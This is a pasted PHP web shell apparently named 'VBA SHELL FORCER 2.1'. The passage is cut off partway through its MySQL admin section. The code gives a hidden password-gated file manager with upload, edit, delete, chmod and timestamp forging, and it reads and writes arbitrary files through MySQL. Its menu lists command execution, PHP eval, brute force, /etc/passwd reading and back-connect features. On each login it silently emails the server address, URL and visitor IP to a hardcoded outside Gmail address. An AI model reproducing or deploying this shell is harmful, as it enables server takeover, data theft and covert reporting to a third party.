· 10 years ago · Mar 21, 2016, 12:21 PM
1<?
2/****************************************\
3|* VBA SHELL FORCER - VERSION 2.1 *|
4|* Edit & Develop by VBATEAM *|
5|* http://vbateam.net *|
6|* == Hacking & Security == *|
7\****************************************/
8
9error_reporting(7);
10@set_magic_quotes_runtime(0);
11ob_start();
12$mtime = explode(' ', microtime());
13$starttime = $mtime[1] + $mtime[0];
14define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
15//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
16define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
17define('IS_COM', class_exists('COM') ? 1 : 0 );
18define('IS_GPC', get_magic_quotes_gpc());
19$dis_func = get_cfg_var('disable_functions');
20define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
21@set_time_limit(0);
22
23foreach(array('_GET','_POST') as $_request) {
24 foreach($$_request as $_key => $_value) {
25 if ($_key{0} != '_') {
26 if (IS_GPC) {
27 $_value = s_array($_value);
28 }
29 $$_key = $_value;
30 }
31 }
32}
33
34/*================= Info Login ================*/
35$admin = array();
36$admin['check'] = true;
37$admin['pass'] = 'byg'; // Password login
38$admin['cookiepre'] = '';
39$admin['cookiedomain'] = '';
40$admin['cookiepath'] = '/';
41$admin['cookielife'] = 86400;
42/*===================== End =====================*/
43
44if ($charset == 'utf8') {
45 header("content-Type: text/html; charset=utf-8");
46} elseif ($charset == 'big5') {
47 header("content-Type: text/html; charset=big5");
48} elseif ($charset == 'gbk') {
49 header("content-Type: text/html; charset=gbk");
50} elseif ($charset == 'latin1') {
51 header("content-Type: text/html; charset=iso-8859-2");
52}
53
54$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
55$timestamp = time();
56
57/*===================== Login =====================*/
58if ($action == "logout") {
59 scookie('vbapass', '', -86400 * 365);
60 p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
61 p('<body background=black>');
62 exit;
63}
64if($admin['check']) {
65 if ($doing == 'login') {
66 if ($admin['pass'] == $password) {
67 scookie('vbapass', $password);
68
69// Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
70$time_shell = "".date("d/m/Y - H:i:s")."";
71$ip_remote = $_SERVER["REMOTE_ADDR"];
72$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']).'';
73$to_email = 'minhduong.pjn@gmail.com';
74$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['HTTP_HOST']."";
75$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
76$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
77@mail($to_email, $server_mail, $linkcr, $header);
78 p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
79 p('<body bgcolor=black>
80<BR><BR><div align=center><font color=yellow face=tahoma size=2>BYG - The Legend of Vietnamese Hacker World - Please wait...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>');
81 exit;
82 }
83
84 else
85 {
86 $err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';
87echo $err_mess;
88 }}
89 if ($_COOKIE['vbapass']) {
90 if ($_COOKIE['vbapass'] != $admin['pass']) {
91 loginpage();
92 }
93 } else {
94 loginpage();
95 }
96}
97/*===================== Login =====================*/
98
99$errmsg = '';
100
101if ($action == 'phpinfo') {
102 if (IS_PHPINFO) {
103 phpinfo();
104 } else {
105 $errmsg = 'phpinfo() function has non-permissible';
106 }
107}
108
109
110if ($doing == 'downfile' && $thefile) {
111 if (!@file_exists($thefile)) {
112 $errmsg = 'The file you want Downloadable was nonexistent';
113 } else {
114 $fileinfo = pathinfo($thefile);
115 header('Content-type: application/x-'.$fileinfo['extension']);
116 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
117 header('Content-Length: '.filesize($thefile));
118 @readfile($thefile);
119 exit;
120 }
121}
122
123
124if ($doing == 'backupmysql' && !$saveasfile) {
125 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
126 $table = array_flip($table);
127 $result = q("SHOW tables");
128 if (!$result) p('<h2>'.mysql_error().'</h2>');
129 $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
130 header('Content-type: application/unknown');
131 header('Content-Disposition: attachment; filename='.$filename);
132 $mysqldata = '';
133 while ($currow = mysql_fetch_array($result)) {
134 if (isset($table[$currow[0]])) {
135 $mysqldata .= sqldumptable($currow[0]);
136 }
137 }
138 mysql_close();
139 exit;
140}
141
142// Mysql
143if($doing=='mysqldown'){
144 if (!$dbname) {
145 $errmsg = 'Please input dbname';
146 } else {
147 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
148 if (!file_exists($mysqldlfile)) {
149 $errmsg = 'The file you want Downloadable was nonexistent';
150 } else {
151 $result = q("select load_file('$mysqldlfile');");
152 if(!$result){
153 q("DROP TABLE IF EXISTS tmp_angel;");
154 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
155 //Download SQL
156 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
157 $result = q("select content from tmp_angel");
158 q("DROP TABLE tmp_angel");
159 }
160 $row = @mysql_fetch_array($result);
161 if (!$row) {
162 $errmsg = 'Load file failed '.mysql_error();
163 } else {
164 $fileinfo = pathinfo($mysqldlfile);
165 header('Content-type: application/x-'.$fileinfo['extension']);
166 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
167 header("Accept-Length: ".strlen($row[0]));
168 echo $row[0];
169 exit;
170 }
171 }
172 }
173}
174
175?>
176<html>
177<head>
178<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
179<title><?php echo str_replace('.','','BYG - The Legend of Vietnamese Hacker World');?></title>
180<style type="text/css">
181body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}
182
183a {color: #74A202;text-decoration:none;}
184a:hover{color: #f00;text-decoration:underline;}
185.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
186.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}
187.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
188.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
189.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}
190.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}
191.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
192.head td span{font-weight:normal;}
193form{margin:0;padding:0;}
194h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
195ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
196u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
197input, textarea, button
198{
199 font-size: 9pt;
200 color: #ccc;
201 font-family: verdana, sans-serif;
202 background-color: #202020;
203 border-left: 1px solid #74A202;
204 border-top: 1px solid #74A202;
205 border-right: 1px solid #74A202;
206 border-bottom: 1px solid #74A202;
207}
208select
209{
210 font-size: 8pt;
211 font-weight: normal;
212 color: #ccc;
213 font-family: verdana, sans-serif;
214 background-color: #202020;
215}
216
217</style>
218<script type="text/javascript">
219function CheckAll(form) {
220 for(var i=0;i<form.elements.length;i++) {
221 var e = form.elements[i];
222 if (e.name != 'chkall')
223 e.checked = form.chkall.checked;
224 }
225}
226function $(id) {
227 return document.getElementById(id);
228}
229function goaction(act){
230 $('goaction').action.value=act;
231 $('goaction').submit();
232}
233</script>
234</head>
235<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>
236
237
238<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
239 <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
240 <tr>
241 <td align="center" valign=center>
242 <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600" align="center">
243 Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">
244 </div>
245 </td>
246 </tr>
247 </table>
248 </div>
249 <script>
250 var ld=(document.all);
251 var ns4=document.layers;
252 var ns6=document.getElementById&&!document.all;
253 var ie4=document.all;
254 if (ns4)
255 ld=document.loading;
256 else if (ns6)
257 ld=document.getElementById("loading").style;
258 else if (ie4)
259 ld=document.all.loading.style;
260 function init()
261 {
262 if(ns4){ld.visibility="hidden";}
263 else if (ns6||ie4) ld.display="none";
264 }
265 </script>
266
267
268
269
270<table width="100%" border="0" cellpadding="0" cellspacing="0">
271 <tr class="head_small">
272 <td width=100%>
273 <table width=100%><tr class="head_small"><td width=86px><a title="BYG - The Legend of Vietnamese Hacker World" href="<?php $self;?>"><img src=http://cB8.upanh.com/19.0.24475887.LHg0/banner.gif height=86 border=0></a></td><td>
274 <span style="float:left;"> <?php echo "Hostname: ".$_SERVER['HTTP_HOST']."";?> | <a href="http://beyeugroup.com" target="_blank"><?php echo str_replace('.','','BYG - The Legend of Vietnamese Hacker World');?> </a> | <a href="javascript:goaction('logout');"><font color=red>Logout</font></a></span> <br />
275
276 <?php
277 $curl_on = @function_exists('curl_version');
278 $mysql_on = @function_exists('mysql_connect');
279 $mssql_on = @function_exists('mssql_connect');
280 $pg_on = @function_exists('pg_connect');
281 $ora_on = @function_exists('ocilogon');
282
283echo (($safe_mode)?("Safe_mod: <b><font color=green>ON</font></b> - "):("Safe_mod: <b><font color=red>OFF</font></b> - "));
284echo "PHP version: <b>".@phpversion()."</b> - ";
285 echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));
286 echo "MySQL: <b>";
287$mysql_on = @function_exists('mysql_connect');
288if($mysql_on){
289echo "<font color=green>ON</font></b> - "; } else { echo "<font color=red>OFF</font></b> - "; }
290echo "MSSQL: <b>";
291$mssql_on = @function_exists('mssql_connect');
292if($mssql_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
293echo "PostgreSQL: <b>";
294$pg_on = @function_exists('pg_connect');
295if($pg_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
296echo "Oracle: <b>";
297$ora_on = @function_exists('ocilogon');
298if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b><BR>";}
299
300echo "Disable functions : <b>";
301if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}
302
303echo "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";
304echo "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";
305 ?>
306 </td></tr></table></td>
307 </tr>
308 <tr class="alt1">
309 <td width=10%><span style="float:left;">[Server IP: <?php echo "<font color=yellow>".gethostbyname($_SERVER['SERVER_NAME'])."</font>";?> - Your IP: <?php echo "<font color=yellow>".$_SERVER['REMOTE_ADDR']."</font>";?>] </span> <br />
310--------------------------------------------------------------------------------------<br />
311
312 <a href="javascript:goaction('file');">File Manager</a> |
313 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
314 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
315 <a href="javascript:goaction('shell');">Execute Command</a> |
316 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
317 <a href="javascript:goaction('eval');">Eval PHP Code</a>
318 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('brute');">Brute</a> <?php }?>
319 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('etcpwd');">/etc/passwd</a> <?php }?>
320 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
321 </td>
322 </tr>
323</table>
324<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
325<?php
326
327formhead(array('name'=>'goaction'));
328makehide('action');
329formfoot();
330
331$errmsg && m($errmsg);
332
333// Dir function
334!$dir && $dir = '.';
335$nowpath = getPath(SA_ROOT, $dir);
336if (substr($dir, -1) != '/') {
337 $dir = $dir.'/';
338}
339$uedir = ue($dir);
340
341if (!$action || $action == 'file') {
342
343 // Non-writeable
344 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
345
346 // Delete dir
347 if ($doing == 'deldir' && $thefile) {
348 if (!file_exists($thefile)) {
349 m($thefile.' directory does not exist');
350 } else {
351 m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
352 }
353 }
354
355 // Create new dir
356 elseif ($newdirname) {
357 $mkdirs = $nowpath.$newdirname;
358 if (file_exists($mkdirs)) {
359 m('Directory has already existed');
360 } else {
361 m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
362 @chmod($mkdirs,0777);
363 }
364 }
365
366 // Upload file
367 elseif ($doupfile) {
368 m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
369 }
370
371 // Edit file
372 elseif ($editfilename && $filecontent) {
373 $fp = @fopen($editfilename,'w');
374 m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
375 @fclose($fp);
376 }
377
378 // Modify
379 elseif ($pfile && $newperm) {
380 if (!file_exists($pfile)) {
381 m('The original file does not exist');
382 } else {
383 $newperm = base_convert($newperm,8,10);
384 m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
385 }
386 }
387
388 // Rename
389 elseif ($oldname && $newfilename) {
390 $nname = $nowpath.$newfilename;
391 if (file_exists($nname) || !file_exists($oldname)) {
392 m($nname.' has already existed or original file does not exist');
393 } else {
394 m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
395 }
396 }
397
398 // Copu
399 elseif ($sname && $tofile) {
400 if (file_exists($tofile) || !file_exists($sname)) {
401 m('The goal file has already existed or original file does not exist');
402 } else {
403 m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
404 }
405 }
406
407 // File exit
408 elseif ($curfile && $tarfile) {
409 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
410 m('The goal file has already existed or original file does not exist');
411 } else {
412 $time = @filemtime($tarfile);
413 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
414 }
415 }
416
417 // Date
418 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
419 if (!@file_exists($curfile)) {
420 m(basename($curfile).' does not exist');
421 } else {
422 $time = strtotime("$year-$month-$day $hour:$minute:$second");
423 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
424 }
425 }
426
427 // Download
428 elseif($doing == 'downrar') {
429 if ($dl) {
430 $dfiles='';
431 foreach ($dl as $filepath => $value) {
432 $dfiles.=$filepath.',';
433 }
434 $dfiles=substr($dfiles,0,strlen($dfiles)-1);
435 $dl=explode(',',$dfiles);
436 $zip=new PHPZip($dl);
437 $code=$zip->out;
438 header('Content-type: application/octet-stream');
439 header('Accept-Ranges: bytes');
440 header('Accept-Length: '.strlen($code));
441 header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
442 echo $code;
443 exit;
444 } else {
445 m('Please select file(s)');
446 }
447 }
448
449 // Delete file
450 elseif($doing == 'delfiles') {
451 if ($dl) {
452 $dfiles='';
453 $succ = $fail = 0;
454 foreach ($dl as $filepath => $value) {
455 if (@unlink($filepath)) {
456 $succ++;
457 } else {
458 $fail++;
459 }
460 }
461 m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail);
462 } else {
463 m('Please select file(s)');
464 }
465 }
466
467 // Function Newdir
468 formhead(array('name'=>'createdir'));
469 makehide('newdirname');
470 makehide('dir',$nowpath);
471 formfoot();
472 formhead(array('name'=>'fileperm'));
473 makehide('newperm');
474 makehide('pfile');
475 makehide('dir',$nowpath);
476 formfoot();
477 formhead(array('name'=>'copyfile'));
478 makehide('sname');
479 makehide('tofile');
480 makehide('dir',$nowpath);
481 formfoot();
482 formhead(array('name'=>'rename'));
483 makehide('oldname');
484 makehide('newfilename');
485 makehide('dir',$nowpath);
486 formfoot();
487 formhead(array('name'=>'fileopform'));
488 makehide('action');
489 makehide('opfile');
490 makehide('dir');
491 formfoot();
492
493 $free = @disk_free_space($nowpath);
494 !$free && $free = 0;
495 $all = @disk_total_space($nowpath);
496 !$all && $all = 0;
497 $used = $all-$free;
498 $used_percent = @round(100/($all/$free),2);
499 p('<font color=yellow face=tahoma size=2><B>File Manager</b> </font> Current disk free <font color=red>'.sizecount($free).'</font> of <font color=red>'.sizecount($all).'</font> (<font color=red>'.$used_percent.'</font>%)</font>');
500
501?>
502<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
503 <form action="" method="post" id="godir" name="godir">
504 <tr>
505 <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
506 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
507 <td nowrap><input class="bt" value="GO" type="submit"></td>
508 </tr>
509 </form>
510</table>
511<script type="text/javascript">
512function createdir(){
513 var newdirname;
514 newdirname = prompt('Please input the directory name:', '');
515 if (!newdirname) return;
516 $('createdir').newdirname.value=newdirname;
517 $('createdir').submit();
518}
519function fileperm(pfile){
520 var newperm;
521 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
522 if (!newperm) return;
523 $('fileperm').newperm.value=newperm;
524 $('fileperm').pfile.value=pfile;
525 $('fileperm').submit();
526}
527function copyfile(sname){
528 var tofile;
529 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
530 if (!tofile) return;
531 $('copyfile').tofile.value=tofile;
532 $('copyfile').sname.value=sname;
533 $('copyfile').submit();
534}
535function rename(oldname){
536 var newfilename;
537 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
538 if (!newfilename) return;
539 $('rename').newfilename.value=newfilename;
540 $('rename').oldname.value=oldname;
541 $('rename').submit();
542}
543function dofile(doing,thefile,m){
544 if (m && !confirm(m)) {
545 return;
546 }
547 $('filelist').doing.value=doing;
548 if (thefile){
549 $('filelist').thefile.value=thefile;
550 }
551 $('filelist').submit();
552}
553function createfile(nowpath){
554 var filename;
555 filename = prompt('Please input the file name:', '');
556 if (!filename) return;
557 opfile('editfile',nowpath + filename,nowpath);
558}
559function opfile(action,opfile,dir){
560 $('fileopform').action.value=action;
561 $('fileopform').opfile.value=opfile;
562 $('fileopform').dir.value=dir;
563 $('fileopform').submit();
564}
565function godir(dir,view_writable){
566 if (view_writable) {
567 $('godir').view_writable.value=1;
568 }
569 $('godir').dir.value=dir;
570 $('godir').submit();
571}
572</script>
573 <?php
574 tbhead();
575 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
576 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
577 p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
578 if ($view_writable) {
579 p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
580 } else {
581 p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
582 }
583 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
584 if (IS_WIN && IS_COM) {
585 $obj = new COM('scripting.filesystemobject');
586 if ($obj && is_object($obj)) {
587 $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
588 foreach($obj->Drives as $drive) {
589 if ($drive->DriveType == 2) {
590 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).' Free:'.sizecount($drive->FreeSpace).' Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
591 } else {
592 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
593 }
594 }
595 }
596 }
597
598 p('</td></tr></form>');
599
600 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
601
602 // Get path
603 $dirdata=array();
604 $filedata=array();
605
606 if ($view_writable) {
607 $dirdata = GetList($nowpath);
608 } else {
609 // Open dir
610 $dirs=@opendir($dir);
611 while ($file=@readdir($dirs)) {
612 $filepath=$nowpath.$file;
613 if(@is_dir($filepath)){
614 $dirdb['filename']=$file;
615 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
616 $dirdb['dirchmod']=getChmod($filepath);
617 $dirdb['dirperm']=getPerms($filepath);
618 $dirdb['fileowner']=getUser($filepath);
619 $dirdb['dirlink']=$nowpath;
620 $dirdb['server_link']=$filepath;
621 $dirdb['client_link']=ue($filepath);
622 $dirdata[]=$dirdb;
623 } else {
624 $filedb['filename']=$file;
625 $filedb['size']=sizecount(@filesize($filepath));
626 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
627 $filedb['filechmod']=getChmod($filepath);
628 $filedb['fileperm']=getPerms($filepath);
629 $filedb['fileowner']=getUser($filepath);
630 $filedb['dirlink']=$nowpath;
631 $filedb['server_link']=$filepath;
632 $filedb['client_link']=ue($filepath);
633 $filedata[]=$filedb;
634 }
635 }// while
636 unset($dirdb);
637 unset($filedb);
638 @closedir($dirs);
639 }
640 @sort($dirdata);
641 @sort($filedata);
642 $dir_i = '0';
643 foreach($dirdata as $key => $dirdb){
644 if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
645 $thisbg = bg();
646 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
647 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
648 p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
649 p('<td nowrap>'.$dirdb['mtime'].'</td>');
650 p('<td nowrap>--</td>');
651 p('<td nowrap>');
652 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
653 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
654 p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
655 p('</tr>');
656 $dir_i++;
657 } else {
658 if($dirdb['filename']=='..') {
659 p('<tr class=fout>');
660 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
661 p('</tr>');
662 }
663 }
664 }
665
666 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
667 p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
668 makehide('action','file');
669 makehide('thefile');
670 makehide('doing');
671 makehide('dir',$nowpath);
672 $file_i = '0';
673 foreach($filedata as $key => $filedb){
674 if($filedb['filename']!='..' && $filedb['filename']!='.') {
675 $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
676 $thisbg = bg();
677 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
678 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
679 p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
680 p('<td nowrap>'.$filedb['mtime'].'</td>');
681 p('<td nowrap>'.$filedb['size'].'</td>');
682 p('<td nowrap>');
683 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
684 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
685 p('<td nowrap>');
686 p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
687 p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
688 p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
689 p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
690 p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
691 p('</td></tr>');
692 $file_i++;
693 }
694 }
695 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
696 p('</form></table>');
697}// end dir
698
699elseif ($action == 'sqlfile') {
700 if($doing=="mysqlupload"){
701 $file = $_FILES['uploadfile'];
702 $filename = $file['tmp_name'];
703 if (file_exists($savepath)) {
704 m('The goal file has already existed');
705 } else {
706 if(!$filename) {
707 m('Please choose a file');
708 } else {
709 $fp=@fopen($filename,'r');
710 $contents=@fread($fp, filesize($filename));
711 @fclose($fp);
712 $contents = bin2hex($contents);
713 if(!$upname) $upname = $file['name'];
714 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
715 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
716 m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
717 }
718 }
719 }
720?>
721<script type="text/javascript">
722function mysqlfile(doing){
723 if(!doing) return;
724 $('doing').value=doing;
725 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
726 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
727 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
728 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
729 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
730 $('mysqlfile').charset.value=$('dbinfo').charset.value;
731 $('mysqlfile').submit();
732}
733</script>
734<?php
735 !$dbhost && $dbhost = 'localhost';
736 !$dbuser && $dbuser = 'root';
737 !$dbport && $dbport = '3306';
738 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
739 formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
740 makehide('action','sqlfile');
741 p('<p>');
742 p('DBHost:');
743 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
744 p(':');
745 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
746 p('DBUser:');
747 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
748 p('DBPass:');
749 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
750 p('DBName:');
751 makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
752 p('DBCharset:');
753 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
754 p('</p>');
755 formfoot();
756 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
757 p('<h2>Upload file</h2>');
758 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
759 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
760 p('<h2>Download file</h2>');
761 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
762 makehide('dbhost');
763 makehide('dbport');
764 makehide('dbuser');
765 makehide('dbpass');
766 makehide('dbname');
767 makehide('charset');
768 makehide('doing');
769 makehide('action','sqlfile');
770 p('</form>');
771}
772
773elseif ($action == 'sqladmin') {
774 !$dbhost && $dbhost = 'localhost';
775 !$dbuser && $dbuser = 'root';
